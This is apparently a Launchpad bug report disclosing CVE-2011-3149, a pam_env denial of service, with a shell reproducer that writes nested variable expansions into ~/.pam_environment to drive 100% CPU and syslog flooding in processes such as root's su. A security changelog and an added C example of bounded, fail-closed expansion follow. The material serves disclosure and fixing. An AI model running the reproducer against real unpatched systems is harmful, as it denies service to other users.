
100% CPU utilization in pam_env parsing

Reported by Kees Cook on 2011-10-14
Affects: pam (Ubuntu); Importance: Undecided; Assigned to: Unassigned

Bug Description

The pam_env variable expansion routine does not correctly abort under some situations when expanding variable names. This triggers 100% CPU use and syslog flooding.

To reproduce:

# The delimiter is quoted so the shell writes the ${...} references literally
# instead of expanding them itself before pam_env ever sees the file.
cat <<'EOM' >~/.pam_environment
EVIL_FILLER_255 DEFAULT=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
EVIL_FILLER_256 DEFAULT=${EVIL_FILLER_255}B
EVIL_FILLER_1024 DEFAULT=${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}
EVIL_FILLER_8191 DEFAULT=${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_255}
EVIL_OVERFLOW_DOS DEFAULT=${EVIL_FILLER_8191}AAAA
EOM

This will trigger CPU usage for whatever process runs the PAM stack. For example, to make root run away, run "su - $USER" and correctly authenticate.

Marc Deslauriers (mdeslaur) wrote :

Please use CVE-2011-3149

Kees Cook (kees) wrote :

I've reported this privately to upstream; waiting for a reply.

Changed in pam (Ubuntu):
status: New → Triaged

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package pam - 1.1.3-2ubuntu2.1

---------------
pam (1.1.3-2ubuntu2.1) oneiric-security; urgency=low

  * SECURITY UPDATE: possible code execution via incorrect environment file
    parsing (LP: #874469)
    - debian/patches-applied/CVE-2011-3148.patch: correctly count leading
      whitespace when parsing environment file in modules/pam_env/pam_env.c.
    - CVE-2011-3148
  * SECURITY UPDATE: denial of service via overflowed environment variable
    expansion (LP: #874565)
    - debian/patches-applied/CVE-2011-3149.patch: when overflowing, exit
      with PAM_BUF_ERR in modules/pam_env/pam_env.c.
    - CVE-2011-3149
  * SECURITY UPDATE: code execution via incorrect environment cleaning
    - debian/patches-applied/update-motd: updated to use clean environment
      and absolute paths in modules/pam_motd/pam_motd.c.
    - CVE-2011-XXXX
 -- Marc Deslauriers <email address hidden> Tue, 18 Oct 2011 09:33:47 -0400

Changed in pam (Ubuntu):
status: Triaged → Fix Released
visibility: private → public
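The fix recorded in the changelog above is to return PAM_BUF_ERR from the expansion routine as soon as an expanded value would no longer fit, instead of continuing. The following is an added example, not code from modules/pam_env/pam_env.c or from the Ubuntu patch: a bounded ${NAME} expander that fails closed on overflow, replayed line by line against the same filler chain the report uses. The 8192-byte buffer size, the EXP_* return codes, the variable table and the MAX_VARS limit are all constructed for this demo.

```c
/* Added example, not pam_env.c: bounded ${NAME} expansion that fails closed
   with a PAM_BUF_ERR-style return when the result would not fit, rather than
   spinning. Buffer size, error codes and variable table are constructed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE    8192   /* assumed expansion buffer; the report's 8191+4 pattern just exceeds it */
#define EXP_OK      0
#define EXP_BUF_ERR 5      /* stands in for PAM_BUF_ERR; the numeric value is illustrative */
#define MAX_VARS    16     /* demo-only cap on the number of defined variables */

struct var { const char *name; const char *value; };

/* Look NAME up among previously defined variables; unknown names expand to "". */
static const char *lookup(const struct var *vars, size_t nvars,
                          const char *name, size_t nlen)
{
    for (size_t i = 0; i < nvars; i++)
        if (strlen(vars[i].name) == nlen && memcmp(vars[i].name, name, nlen) == 0)
            return vars[i].value;
    return "";
}

/* Expand ${NAME} references in src into dst (capacity dst_cap, NUL included).
   Every write is checked against the remaining space; running out returns
   EXP_BUF_ERR immediately, with no truncation and no retry loop. */
int expand_bounded(const char *src, char *dst, size_t dst_cap,
                   const struct var *vars, size_t nvars)
{
    size_t out = 0;
    const char *p = src;
    if (dst_cap == 0) return EXP_BUF_ERR;
    while (*p) {
        const char *end = NULL;
        if (p[0] == '$' && p[1] == '{') end = strchr(p + 2, '}');
        if (end) {                                   /* a well-formed ${NAME} */
            const char *val = lookup(vars, nvars, p + 2, (size_t)(end - (p + 2)));
            size_t vlen = strlen(val);
            if (vlen > dst_cap - 1 - out) return EXP_BUF_ERR;
            memcpy(dst + out, val, vlen);
            out += vlen;
            p = end + 1;
        } else {                                     /* literal byte, including a stray '$' */
            if (out >= dst_cap - 1) return EXP_BUF_ERR;
            dst[out++] = *p++;
        }
    }
    dst[out] = '\0';
    return EXP_OK;
}

static char *dup_str(const char *s)
{
    size_t n = strlen(s) + 1;
    char *d = malloc(n);
    if (d) memcpy(d, s, n);
    return d;
}

/* Replay the report's nesting pattern: each value is expanded against the
   variables defined on the lines above it, in order. Returns the result of the
   last expansion attempted; *final_len receives the length of the last value
   that expanded successfully. */
int replay_filler_chain(size_t buf_size, size_t *final_len)
{
    char filler255[256];
    memset(filler255, 'B', 255);
    filler255[255] = '\0';
    const char *lines[][2] = {
        { "FILLER_255",  filler255 },
        { "FILLER_256",  "${FILLER_255}B" },
        { "FILLER_1024", "${FILLER_256}${FILLER_256}${FILLER_256}${FILLER_256}" },
        { "FILLER_8191", "${FILLER_1024}${FILLER_1024}${FILLER_1024}${FILLER_1024}"
                         "${FILLER_1024}${FILLER_1024}${FILLER_1024}"
                         "${FILLER_256}${FILLER_256}${FILLER_256}${FILLER_255}" },
        { "OVERFLOW",    "${FILLER_8191}AAAA" },
    };
    size_t nlines = sizeof lines / sizeof lines[0];
    struct var vars[MAX_VARS];
    size_t nvars = 0;
    int rc = EXP_OK;
    char *buf = malloc(buf_size);
    *final_len = 0;
    if (!buf) return EXP_BUF_ERR;
    for (size_t i = 0; i < nlines && nvars < MAX_VARS; i++) {
        rc = expand_bounded(lines[i][1], buf, buf_size, vars, nvars);
        if (rc != EXP_OK) break;                     /* fail closed: stop processing the file */
        char *copy = dup_str(buf);
        if (!copy) { rc = EXP_BUF_ERR; break; }
        vars[nvars].name = lines[i][0];
        vars[nvars].value = copy;
        *final_len = strlen(buf);
        nvars++;
    }
    for (size_t i = 0; i < nvars; i++) free((char *)vars[i].value);
    free(buf);
    return rc;
}

int main(void)
{
    size_t len = 0;
    int rc = replay_filler_chain(BUF_SIZE, &len);
    printf("chain with %d-byte buffer: rc=%d (0=ok, 5=buf_err), last good length=%zu\n",
           BUF_SIZE, rc, len);
    return 0;
}
```

With the 8192-byte buffer the first four lines expand (the last of them to exactly 8191 bytes) and the fifth is rejected at its first extra byte; with a larger buffer the whole chain expands to 8195 bytes. The point is that the decision is made once, at the write that would overflow, so a hostile ~/.pam_environment costs one pass over the file and one error return rather than a busy loop and a flood of syslog messages.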